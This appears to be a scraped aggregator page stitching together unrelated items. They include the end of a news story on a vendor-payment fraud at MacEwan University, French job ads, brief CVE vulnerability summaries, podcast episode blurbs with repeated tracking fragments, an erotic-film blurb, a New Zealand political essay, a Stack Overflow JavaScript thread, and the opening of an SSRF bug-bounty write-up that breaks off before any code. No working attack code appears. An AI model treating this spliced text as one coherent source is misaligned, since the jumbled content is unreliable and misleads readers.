    Financial crimes specialist Garry Clement, who did not work on the case, said criminal networks between Canada and Asia have been well established over decades. Clement previously worked with police for 34 years, going undercover to chase some of the highest levels of organized crime in Canada. He was also formerly the national director for the RCMP’s Proceeds of Crime Program.

    Clement said that, prior to 1997, there wasn’t a specific charge under the Criminal Code of Canada for being a member of an organized crime group, as there is under Hong Kong law. Without an equivalent on the books, immigrants with that kind of criminal history wouldn’t be automatically precluded from entering Canada.

    “As a result, we did end up with our fair share of known organized-crime figures in Canada,” said Clement.

    This allowed criminals to set up networks between the two countries that have persisted to this day.

    “You’ve created a network, and that network enables you to do a lot of things through various company formations,” said Clement. “That is essentially what you are seeing in China: Money is flowing that has been defrauded.”

    Clement said it is not uncommon for the proceeds of crime to end up in legitimate investments as criminals look to keep their money safe and out of reach of authorities. An investment of choice, said Clement, is real estate, given its relative stability and the large sums of money involved.

    “Nobody asks the genesis of the money,” Clement said.

    Through legal action in Hong Kong, the university was able to recover nearly $3.8 million from another individual — not named in court documents available in Vancouver or Montreal — who had also been transferred stolen MacEwan funds from the Mono Shoes TD Bank account.

    In all, MacEwan University announced on April 4, 2018 that it had successfully recovered $10.9 million of the $11.8 million lost to the scam.

    More than $960,000 remains missing — a stinging loss that has prompted change at the university and beyond.

    “Taxpayers rightly expect that the money we give to universities is spent on educating our students and isn’t lost because of poor financial controls that are in place,” Advanced Education Minister Marlin Schmidt told StarMetro in a recent interview. “We all have a fiduciary responsibility to make sure that the money is spent properly.”

    After finding out it had been defrauded, the university waited a week before alerting the public to the loss. A press release assured students that the university’s IT systems were secure and that it had already begun tracking the majority of the stolen funds with the help of legal counsel in Montreal, London and Hong Kong.

    MacEwan University president Deborah Saucier was not made available for comment.

    When the administration credited the “swift response and diligent efforts” of staff, legal counsel, investigators and the banks for seeing the return of 92 per cent of the lost funds, it revealed few details about where the money went or how it was recovered.

    That was by design. A presentation to the 2018 Canadian Association of University Business Officers Conference reveals university officials feared “significant political fallout” and loss of reputation in the wake of the scam. University executives, according to the document, refused to provide media with access to Saucier and employed a “disciplined” communications strategy, despite public promises of transparency.

    In a statement posted online in October 2017, Saucier said “the fraud did shine spotlights on two glaring gaps in our organization.”

    An internal audit revealed there were inadequate controls in place for changing payment information. There was no requirement for a manager or supervisor to review changes to payment information on file. It also found employees didn’t bother to contact the vendor in any way to confirm the request was valid.

    The press release sent out in April outlined some of the measures administration took to ensure they wouldn’t be fooled again.

    Employees are now required to verify all changes to vendor files by phone and a followup email, and all financial changes must first be reviewed by a supervisor, manager or director. A supplied audit report system was also implemented, tracking every change made to vendor files. The university has made employee training in social engineering attacks, phishing and other online scams mandatory.

    Minister Schmidt praised MacEwan for making changes to its financial department, “including some staff changes at the highest levels, which was a good first step.”

    Brent Quinton, who was the university’s vice-president of finance and administration at the time of the fraud, resigned from his position three weeks after the fraud was discovered, walking away with a $540,000 severance payout.

    No staff members were fired, though some were placed in different positions. Harry Oosteroff, executive director of the MacEwan Staff Association, said “our members were treated appropriately.”

    The provincial government is taking steps to prevent such costly, embarrassing mistakes in the future. The Ministry of Advanced Education’s senior financial officer is now leading a team tasked with “identifying ways that we can help build capacity at institutions to improve their financial controls” so public dollars allocated for the benefit of post-secondary students don’t end up in the wrong hands.

    “There are always improvements that can be made, and our department is working with institutions to continually improve the financial systems that are used to protect the taxpayers’ dollars,” Schmidt said.

    After all, this isn’t the first time a post-secondary institution in Alberta has been fooled. An investigation into a similar fraud at the University of Lethbridge found that while the university had such controls in place, staff weren’t following them.

    The University of Lethbridge sent $368,000 to scammers over a two-month period in 2016, “when payments owing to an external vendor of the university were sent through a process of misdirection to an alternative, nonauthentic bank account,” said Mike Mahon, president and vice-chancellor, in a statement in December 2016.

    Const. Lewadniuk said low-tech solutions, such as having two people sign off on financial transactions or following up on emails with a phone call to the person or company in question, can be key in avoiding high-tech fraud.

    There are institutional changes on the horizon as well. Clement, the financial crimes specialist, is eager to see stronger regulations around identifying beneficial ownership of property, corporations and bank accounts. Beneficial ownership is an arrangement in which the person who enjoys the benefits of the property or bank accounts, such as profits, isn’t necessarily the person listed on the title.

    Clement said that, until recently, numbered companies would have one or two directors listed, “but there was not that requirement to drill down to see who is actually the beneficial owners of that money.”

    Finance ministers across Canada entered an agreement to strengthen such regulations and bring them into force by July 1, 2019. The regulations seek to curb the misuse of corporations and other legal entities being exploited for tax evasion, money laundering, corruption and financing terrorism.

    But until those regulations are brought into force and investigators are given the resources they need to chase down these types of crime, Clement fears such financial crime will continue “unabated.”

    “If you stem the flow of money and stem their ability to make that profit, you can curb a lot of activity,” said Clement. “But as long as there’s that profit to be made, people are going to gamble.”

    Claire Theobald is an Edmonton-based reporter who covers crime and the courts. Follow her on Twitter: @clairetheobald

    With files from Michael Mui, Vancouver-based investigative reporter. Follow him on Twitter: @mui24hours


              Mécanicien(ne) de véhicules lourds (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Rebâtir, réviser, réparer et régler tous les équipements munis d'un moteur à... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:46:11 GMT - View all Fermont, QC jobs
              Conducteur(trice) d'équipement minier (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Sous la supervision du contremaître des opérations minières, les titulaires... $35.78 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:54 GMT - View all Fermont, QC jobs
              Mécanicien(ne) d'entretien (Banque de candidatures) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Relevant du contremaître du service concerné, les mécaniciens effectuent les... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:48 GMT - View all Fermont, QC jobs
              Boutefeu - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC      Cache   Translate Page      
    Veuillez noter que ce poste nécessite un déménagement dans la ville de Fermont. Préparer les trous de forage pour le sautage tels que :.... $38.44 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:39 GMT - View all Fermont, QC jobs
              Microsoft Filter Manager Elevation Of Privilege (CVE-2018-8333)      Cache   Translate Page      
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft Windows Shell Remote Code Execution (CVE-2018-8495)      Cache   Translate Page      
    A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft NTFS Elevation of Privilege (CVE-2018-8411)      Cache   Translate Page      
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft DirectX Information Disclosure (CVE-2018-8486)      Cache   Translate Page      
    An information disclosure vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.
              Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2018-8505)      Cache   Translate Page      
    A memory corruption vulnerability exists in Microsoft Edge. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Apache Portals Pluto Remote Code Execution (CVE-2018-1306)      Cache   Translate Page      
    A vulnerability exists in Apache Portals Pluto, The vulnerability is due to improper handling of http methods. A remote attacker can exploit this vulnerability by submitting a crafted request to the target server.
              Microsoft Win32k Elevation of Privilege (CVE-2018-8453)      Cache   Translate Page      
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft Internet Explorer Memory Corruption (CVE-2018-8491)      Cache   Translate Page      
    A memory corruption vulnerability exists in Microsoft Internet Explorer. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft Device Guard Code Integrity Policy Security Feature Bypass (CVE-2018-8492)      Cache   Translate Page      
    A security bypass vulnerability exists in Microsoft Device Guard. Successful exploitation of this vulnerability would allow remote attackers to bypass security tests and protocols on the affected system.
              Microsoft Windows Theme API Remote Code Execution (CVE-2018-8413)      Cache   Translate Page      
    A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Hack / Protect / Predict SQL Server (Slides for SQL Saturday Orlando 801)      Cache   Translate Page      

    Hi, I’m excited to share with you that I’ll be presenting this Saturday, October 6, 2018 at SQL Saturday Orlando. The most fun SQL Saturday event I’ve attended.It’s going to be my first time announcing this content on SQL Server 2019 (currently ctp 2) and SSMS 18 preview 4 . Plus, maybe playing SQL Family Feud.

    I tend to pack a lot of content into my presentations so the audience can take the most home. I am sharing my slides here, prior to the presentation, so we can cover all the demos at the session and have ample time for Q&A.

    Please join me at Room 1 (means To Be Announced) at Seminole State College (Sanford/Lake Mary Campus) building UP at 11 am for SQL Saturday Orlando 801 .

    Slides

    Title:Hack / Protect / Predict SQL Server Come learn them.

    Speaker: Fleitas , Hiram

    Duration: 60 minutes

    Track: Application & Database Development

    Level: Advanced

    https://sqlsaturday.com/801/Sessions/Details.aspx?sid=83672

    Abstract:

    In this session, I’ll show you how to hack SQL Server using a simple C# console application and other tools. Most importantly, I’ll show you how to protect vectors that perhaps you’re trying to use to safeguard sensitive data for GDPR compliance.

    Tabular Data Stream (TDS) Protocol Dynamic Data Masking Row Level Security (Yep…) Database Source Control

    Perhaps, you’ve seen these exploits before but do you really know how to reproduce them? Or, how to even protect yourself against them? No worries, I’ll show you the way along with a load test.

    Finally, I am very excited to share with you how to analyze text using pre-trained Machine Learning models to predict a sentiment, on-prem with SQL Server 2017.

    SQL ML / AI A deep dive to predict the sentiment

    Looking forward to meeting you all.

    Bio:

    Hiram Fleitasis the Principal Database Architect at Universal Property and Casualty Insurance Company and leads the company’s intelligent edge using Microsoft’s data platform. He currently is developing database applications using Machine Learning models trained on claims, policy, and social-media data to predict business opportunities for customer satisfaction and loyalty in real-time.

    He has worked with SQL Server for 20 years, from version 6.0 to 2019 with some of the largest companies in the world. He’s spoken on SQL Server at User Groups, South Florida Code Camp, PASS SQL Saturdays and corporate business events, often presenting talks on security, performance, devops, machine learning, and business intelligence. He coded his first program in BASIC when he was 13 years old as a school project and developed a passion in computers ever since.

    Hiram is also a code contributor to several opensource projects and serves as an IS Flotilla Staff Officer for the United States Coast Guard Auxiliary. On his time off he mostly enjoys spending time with his wife Christina and two kids, Ocean and Skylar Fleitas. He also wakeboards, wakesurfs, snowboards and does endurance training events by GORUCK’s Cadre-led decorated combat veterans of Special Operations.

    https://linkedin.com/in/hiramfleitas/

    https://fleitasarts.com

    Date & Time:

    Saturday Oct 6, 2018

    11:00 am 12:00 pm Presentation

    Location:

    Seminole State College

    Sanford/Lake Mary Campus

    100 Weldon Blvd Building UP, Sanford, Florida, 32773

    Room #: R1 (TBA)

    Follow #SQLSatOrlando on Twitter

    Follow @HiramFleitas on Twitter


              Episode 317: Some Fishy Chips | TechSNAP 317      Cache   Translate Page      

    Intel's patched a remote execution exploit that’s been lurking in their chips for the past nine years, we’ve got the details & some handy tips to check if you’re affected. Then Dan does a deep dive into friend of the show Tarsnap: what it is, how to use it & why it’s so awesome. Plus we discuss when we use external services versus building ourselves & a few tips for lightweight backup solutions that might work for you.

    Then your fantastic feedback, a riotous roundup & so much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 305: Gambling with Code | TechSNAP 305      Cache   Translate Page      

    We’ve got the latest on GitLabs data disaster, a clever new method to cheat at the slots & a new Netgear exploit thats coming for your network!

    Plus your feedback, a giant roundup & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 296: Schoolhouse Exploits | TechSNAP 296      Cache   Translate Page      

    Project Zero breaks the chain, we share stories from our mischievous past & malware as a service gets busted.

    Plus your great questions, a packed round up & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 274: Windows Exploit Edition | TechSNAP 274      Cache   Translate Page      
    On this weeks episode we cover a UEFI firmware bug that is affecting computers including ThinkPads, tell you how your windows box can be totally pwned even if it's fully encrypted & talk about the shortcomings of the MD5 checksum. Plus the feedback, the roundup & more!#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 269: 10,000 Cables Under the Sea | TechSNAP 269      Cache   Translate Page      

    Windows exploits for sale at a great price, how the Internet works, yes, seriously & it's awesome!

    Plus we solve some of your problems, a great roundup & more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 268: PIS Poor DNS | TechSNAP 268      Cache   Translate Page      

    Is the “Dark Cloud” hype, or a real technology? Using DNS tunneling for remote command and control & the big problem with 1-Day exploits.

    Plus your great question, our answers, a breaking news roundup & more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 266: Curl Sleeper Agent | TechSNAP 266      Cache   Translate Page      

    Zero-day exploits striking over 100 systems, if you think copying links to bash scripts from the internet is okay, maybe you shouldn't be root & the day Google automated itself off the internet.

    Plus your questions, our answers, a huge round up & more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 258: Metaphorically Exploited | TechSNAP 258      Cache   Translate Page      

    The theoretical Android flaw becomes reality, a simple phishing scam hits some major companies & why your PIN has already been leaked.

    Plus great questions, our answers, a rocking round up & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 252: Hot Norse Potato | TechSNAP 252      Cache   Translate Page      

    A new openSSL exploit, cyber security firm Norse implodes & the Windows Hot Potato flaw that’s been around for over a decade.

    Plus great questions, our answers, a rockin round up & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 242: A Keyboard Walks into a Barcode | TechSNAP 242      Cache   Translate Page      

    A research team finds various ways to attack LastPass, how to use a cocktail of current Android exploits to own a device & hacking a point of sale system using poisoned barcodes!

    Plus some great questions, our answers, a rockin roundup & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 236: National Security Breaking Agency | TechSNAP 236      Cache   Translate Page      

    How the NSA might be breaking Crypto, fresh zero day exploit against Flash with a twist & Keylogging before computers.

    Plus a great batch of your questions, a rocking round-up & much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 235: Catching the Angler | TechSNAP 235      Cache   Translate Page      

    Debug mode exposes sensitive data, Cisco’s Talos group exposes the Angler exploit kit & how a Microsoft exposed Conficker with an egg hunt.

    Plus some great feedback, a huge round up & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 234: Key Flaw With GPL | TechSNAP 234      Cache   Translate Page      

    D-Link publishes its private code signing keys, exploiting Windows Symbolic Links & why encryption is not sufficient protection.

    Plus some great questions, our answers, a rockin roundup & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 226: Solving the Flash Plague | TechSNAP 226      Cache   Translate Page      

    Adobe is making changes to Flash to mitigate 0day exploits, with help from Google. Chrysler recalls 1.4M vehicles due to a software flaw, we go inside the “Business Club” cyber crime gang.

    Plus a great batch of questions, the roundup & more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Stagiaire en Informatique – technologies d'exploitation minière - Rio Tinto - Havre-Saint-Pierre, QC      Cache   Translate Page      
    On les trouve partout, des téléphones intelligents aux avions et aux voitures, en passant par les hôpitaux et les maisons....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT - View all Havre-Saint-Pierre, QC jobs
              Episode 199: Internet of Problems | TechSNAP 199      Cache   Translate Page      

    The internet of dangerous things is arriving but what about taking care of the devices we already have? We’ll discuss!

    Plus details on critical updates from Adobe, the surprising number of Gas Stations vulnerable to exploitation via the internet, your questions, our answers & much, much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Episode 198: Dude Where's My Card? | TechSNAP 198      Cache   Translate Page      

    Adobe has a bad week, with exploits in the wild & no patch. We’ll share the details. Had your credit card stolen? We’ll tell you how.

    Plus the harsh reality for IT departments, a great batch of questions, our answers & much much more!

    #source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
              Assistante(e) technique en pharmacie- Temps Partiel - Pharmaprix - Montréal, QC      Cache   Translate Page      
    Lieu: 4999 Chemin Queen Mary, Arr. Cdn / Ndg, Montreal, Québec, H3W 1X4 Joignez-vous à un magasin qui appartient à des intérêts locaux et est exploité par...
    From Shoppers Drug Mart / Pharmaprix - Tue, 09 Oct 2018 21:32:10 GMT - View all Montréal, QC jobs
              Sappho 68      Cache   Translate Page      
    Video: Sappho 68
    Watch This Video!
    Studio: Media Blasters
    Recommended For Rental

    From 70's Swedish adult film director Jan Anders, comes a deep, penetrating piece of artful vintage erotica! A probing examination of woman-to-woman pleasures, Sappho '68 was a groundbreaking adult film that balanced artful, tasteful filmmaking with the seductive innocence of the soft core nudie-cutie genre. Showcasing the ample charms of 70's erotic/exploitation cinema legend Uschi Digard!

    Jennifer Bradley (played by Barbara Corey AKA Janis Kelly AKA Petra Andrews, an ex-roommate of Sharon Tate who also met an early tragic demise!) is a small town girl who moves to the big city to find success as a photographer where she is swept away by San Francisco's thriving sexual revolution.

    Unsatisfied with her male relationships, she chooses to frolic with one of her sexy female models, Belinda. Together they discover and experience the unbridled passions, pleasures, and tragic pitfalls of unrestrained sexual freedom!

    Stars: Barbra Corey, Janis Kelly, Petra Andrews, Russ Meyer, Uschi Digart

              Petrol Pump Politics.      Cache   Translate Page      
    Unaffordable?  Labour supporters should brace themselves for a National Party-driven social media campaign built around the slogan: “At $2.40 a litre, we can’t afford Jacinda.” Re-cycled though this catch-phrase may be, for Kiwis on low incomes paying far too much for gas it’s likely to have a catchy ring to it. (And anyone on the Labour team thinking about telling these folk to “go electric” should, perhaps, recall the effect on the breadless masses of the thoughtless suggestion that they should consider eating cake!)

    “AT A DOLLAR a gallon we can’t afford Rowling.” Given his latest media release (8/10/18)  “Government Pricing Kiwis Out Of Their Cars”, someone’s obviously been schooling up young Simon Bridges on the way Rob Muldoon smashed Labour in 1975.

    [Bill Rowling, for all you millennials out there, was the Labour Prime Minister of New Zealand from September 1974 until December 1975, and a gallon (4.5 litres) was the unit of measure at the petrol pump. So, yes, you’re right, the motorists of 1975 paid roughly a tenth of what we pay today to fill up our tanks! – C.T.]

    But even back when petrol was only a dollar a gallon, Kiwi motorists were hurting. Ever since the Yom Kippur War of October 1973, during which Egypt and Syria came within an ace of destroying the State of Israel, the price of oil had soared. Saudi Arabia and the other Arab oil-exporters had imposed an embargo on the USA and its allies for resupplying the Israelis with arms and ammunition. The resulting price-hikes delivered a stunning blow to the Western economy. The so-called “Oil Shocks” of 1973-79 marked the end of the Great Post-War Boom. Almost overnight, New Zealanders – along with just about everyone else in the Western World – lost confidence in the future. Even worse, they began casting about for someone to blame.

    Hence, the National Party’s propaganda blaming soaring oil prices on Bill Rowling. Of course, anybody who had been following current affairs over the previous two years knew perfectly well that National was peddling what today we would call “fake news”. But, those weren’t the people Muldoon was after. The voters he was seeking to enlist alongside National’s habitual supporters were the disoriented, frustrated and just flat-out angry working-class Kiwis who were struggling to work out what had all-of-a-sudden gone wrong with their world.

    Like the former Democratic Party supporters backing Trump in 2016, these bewildered Labour voters found it increasingly difficult to identify with “their” party. Labour was supposed to stand for “the working man” and his values, but now, following the tragic death of that quintessential working-class battler, “Big Norm” Kirk in August 1974, the party was led by a training-college lecturer. What’s more, he and his colleagues were advancing policies which seemed to have more in common with the demands of the long-haired hippies and protesters in the streets than they did with the “ordinary Kiwi joker” and his concerns. Not the least of these being the soaring price of petrol.

    Muldoon and his campaign advisers were only too aware of the culture war that was brewing in the Labour Party and they couldn’t wait to exploit it.

    Over the course of the 1960s and 70s, Labour’s membership had dwindled. The party branches were peopled predominantly by people who may have been young and radical in the 1930s and 40s but who were now very settled in their ways – and views – which tended towards the socially conservative. Many Labour stalwarts were Roman Catholics, Baptists and Salvation Army members. They bitterly resented the small but active groups of liberals and radicals who had begun drifting into Labour from 1969 onwards. They were seen as middle-class carpet-baggers without the slightest idea of what it meant to be a working-class Kiwi.

    These were the people for whom National’s election slogan, “New Zealand the way YOU want it”, was created. The people who had begun to feel neglected, misunderstood and even a little bit despised by the people at the top of the Labour Party – and their intellectual friends. Some of the more prominent of these had banded together in the group called “Citizens for Rowling”. In the ears of a great many Kiwis, that sounded a lot more like “Citizens Against Muldoon”.

    It was a huge strategic error on the part of Labour’s hifalutin supporters. Instead of turning people against the pugnacious National leader, it drew them towards him. Just as liberal America’s hatred of Trump only served to entrench his support among aggrieved Americans without college degrees or six-figure salaries, Labour’s near-obsession with Rob Muldoon proved to be one of the key factors in the growth of “Rob’s Mob”. This was the peculiar assemblage of “ordinary blokes and blokesses” for whom Muldoon felt more like a Labour leader than the thoroughly decent but doggedly uninspiring Rowling.

    Forty years on, Labour supporters should brace themselves for a National Party-driven social media campaign built around the slogan: “At $2.40 a litre, we can’t afford Jacinda.” Second-hand though it may be, it’s bound to acquire some measure of political purchase. How could it not when, for Kiwis on low incomes, $2.40 a litre for gas is just one more burden for them to bear. (And anyone on the Labour team thinking about telling these folk to “go electric” should, perhaps, recall the effect on the breadless masses of the thoughtless suggestion that they should consider eating cake!)

    National’s big problem is that Simon Bridges is not Rob Muldoon. Bridges simply does not possess Muldoon’s ability to inspire both confidence and hope, fear and dread. Nor is Jacinda Ardern even remotely like Bill Rowling. The latter always came across as the person for whom the saying “nice guys finish last” was invented. And although stardust was intermittently available to politicians back in 1975, the historical record makes it very clear that nobody ever got so much as a speck of it to Bill.

    About the only thing Bridges has got going for him is that, unlike the 1973-79 oil shocks, the steady rise in the price of petrol over the period 2018-2021 cannot be sheeted home to greedy Arab oil magnates. This time, a large measure of it is Labour’s own work.

    This essay was originally posted on The Daily Blogof Tuesday, 9 October 2018.

              Better practices in large Html5 projects? (Mainly Javascript but some Html/Css)      Cache   Translate Page      

    The main reason why I ask this question is because I hear about a lot of outdated JS techniques that are no good any more or just outdated. Seeing threads from '08 scares me after hearing all the negativity about older JS.

    My main concerns are variables and files.

    I want to create some kind of advanced calculator for a video game so I will have TONS of variables that need to be global. Since characters in the game have so many different 'stats', is it better to do something like this even if it means more writing, well just a prefix before everything:

    stats.health = 50; stats.mana = 50; stats.whatever = 100; //or is this better: health = 50; mana = 50; whatever = 100;

    Next question is about the files. I will have quite a few arrays with tons of data, lots of images loaded and lots of onTouch functions for the images. Do I create seperate JS files for each? First load all the data, then the images and then the functions and at the very bottom before the /html or /body tag add the listeners? I come from Lua, although I've known html + css from before, I'm just starting out in JS so any advices is greatly appreciated.

    Another thing that I'm not sure of is, I've seen at least 3 methods of creating images, what's the difference between them?

    For example:

    for (var i = 0; i < imageSrc.length; i++) { image[i] = new Image(); image[i].src = "images/" + imageSrc[i] + ".png"; end

    also:

    document.createElement("img");

    That's using javascript to create images while the user is using the page.

    Is there a better way to create images that will exist right from the beginning? For example creating this within a div:

    <img id="bgMain" src="images/background.png" style="position:absolute; top:0px; left:0px;" />

    My last question is: http://jsperf.com/cached-vs-getelementbyid/5

    The performance for cache is obviously way better, but I don't understand what obj.elems.el is at all or if I look into it. Does anyone have a link to proper explaining on how to cache variables?

    Also any extra info and tips on better coding practices is greatly appreciated. Thanks so much for reading and thanks in advance for any help!

    Problem courtesy of: Hate Names

    Solution I will have TONS of variables that need to be global

    Why do they need to be global? Seeing by your data, you are doing some character stats calculator. I suggest you learn OOP in JavaScript and build your character models based on objects. That way, they are "instances of characters" and not globals. I would looks something like:

    //build a character var character = new Character('XXXfoozballXXX'); character.health = 100; character.mana = 100; character.simulateHit(); character.setStats({ str:120, agi:120, luk:90, ... }); //The data never lives in the global. They are in the instances of objects. //You can discard them and build new ones without worry of globals or resetting I will have quite a few arrays with tons of data, lots of images loaded and lots of onTouch functions for the images. Do I create seperate JS files for each?

    You need some dependency handling framework, and structure. I suggest you learn RequireJS and Backbone for starters. There are other frameworks out there, they just happen to be what I use at the moment.

    RequireJS will require you to split the files for modularity and reusability, but will compile them with their optimizer into one file. Backbone provides a way for you to split your data, your UI and your logic into objects as well, making it important you learn OOP first.

    Another thing that I'm not sure of is, I've seen at least 3 methods of creating images, what's the difference between them?

    There are a lot of ways of doing it:

    .innerHTML()

    I prefer the second method, since it's OOP-like which will be much easier to handle with other OOP-like code.

    The performance for cache is obviously way better, but I don't understand what obj.elems.el is at all or if I look into it. Does anyone have a link to proper explaining on how to cache variables?

    What the cached method did was to get the element from the DOM only once as well as reducing the entire test into assignments rather than binding, fetching etc. JavaScript and the DOM are "separate worlds", so to speak. Crossing code from one "land" to the other entails overhead.

    To avoid that overhead, you limit the "crossings". Since you already fetched the element once, and have reference of it now, you need not fetch it again. Instead, reuse already existing references.

    Solution courtesy of: Joseph

    Discussion

    The biggest arguments against previous JS exploits have been tons of global variables and the increased potential for collisions... the simplest way around this has historically been namespacing...

    //"this" is the global namespace, window in a browser. this.project = this.project || {}; //establish project namespace project.section = project.section || {}; // project.section project.section.somevar = 0; project.section.someMethod = function(){ ... };

    This has it's ups and down sides, the upside is you get structure, and can avoid collisions... the down side is that this practice takes a lot of discipline to minimize leaky abstractions. Also, the cost of tree searching for project.section.subsection.area.method has a bit of a lookup cost.

    You can reduce leaky abstractions (accidental variable leaks) by wrapping your code files in Immediately Invoked Function Expressions (IIFE)

    (function(){ this.project = this.project || {}; // }());

    Even then, there is still a lot of work involved in maintaining such a codebase. More recently there has been a growth in module patters for JavaScript. You will probably want to think in terms of modules, and working with those modules and objects/classes they expose. Currently there are two popular patterns for this, which are Asynchronous Module Design (AMD) and CommonJS (CJS) there are also many different tools for building your modules into scripts that can be used client side.

    You will most likely want to use RequireJS (AMD), and look into Bower (JS Package Manager), Grunt and Yeoman .

    There are quite a few tutorials available for this, and you may want to look into a toolkit like FrozenJS , at least for structure examples.

    Following is an example of how you might structure a module for your system... said module would be for a given Character on the field that inherits from field module's Entity... You would expose a constructor 'Character' that has a bind(field) method, and a render() method... to handle its' own state. You could think of this as a character controller or ViewModel (in MVC/MVVM terms).

    //character.js AMD Module define(['jQuery','./field'],function($,fieldModule){ //module return { 'Character':CharacterObject ... }; function CharacterObject() { ... constructor internals ... } //inherit from field.Entity CharacterObject.prototype = new fieldModule.Entity(); //prototype methods CharacterObject.prototype.bind = function(fieldInstance) { ... bind the CharacterObject instance to the field ... } CharacterObject.prototype.render = function() { ... render UI update(s) ... //assuming an event loop for UI processing } ... });

    Beyond all of this, you may want to even consider coffee-script which reduces the chance of certain behavioral issues even farther, at the cost of a middle-man language/compilation step that you may not find worthwhile.

    Discussion courtesy of: Tracker1

    There is really no good argument for having many global variables. Make a single global container, and stick everything inside of it.

    window.globalContainer = {}; globalContainer.var1 = 1; globalContainer.var2 = 2; //etc

    More than likely you will realize that it is possible to not even use a globalContainer as you can have everything run in a scoped environment where entry is dictated by events.

    Every file which houses .js must be fetched. The fetching is slow, so you should just try to do it once instead of multiple times. Combine all the script you can into one file instead of having them all over the place. That being said, you should only do that for production - when developing you should do what is most readable. Keep in mind that your production and development javascript should always be different. One which is easy to read and logically separated, and one which is easy to transfer, and minified.

    The route you take to load an image does not really matter. createImage or new Image() will both have the same results. The important thing to remember is that the actual image is not fetched until .src has been assigned. When that happens, the image is loaded. Once a browser sees a resource it caches it. So that is how the preloading magic happens. Rendering is a whole other beast. Even if you have cached an image it may take some time to render, especially if there are many of them set to render at once and they are large images.

    Discussion courtesy of: Travis J

    This recipe can be found in it's original form on Stack Over Flow .


              AWS takeover through SSRF in JavaScript      Cache   Translate Page      

    Here is the story of a bug I found in a private bug bounty program on Hackerone . It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

    Intro

    As I said, the program is private so the company, let’s call it: ArticMonkey.

    For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a javascript version, let’s dig in!

    The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

    Spot the issue

    I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

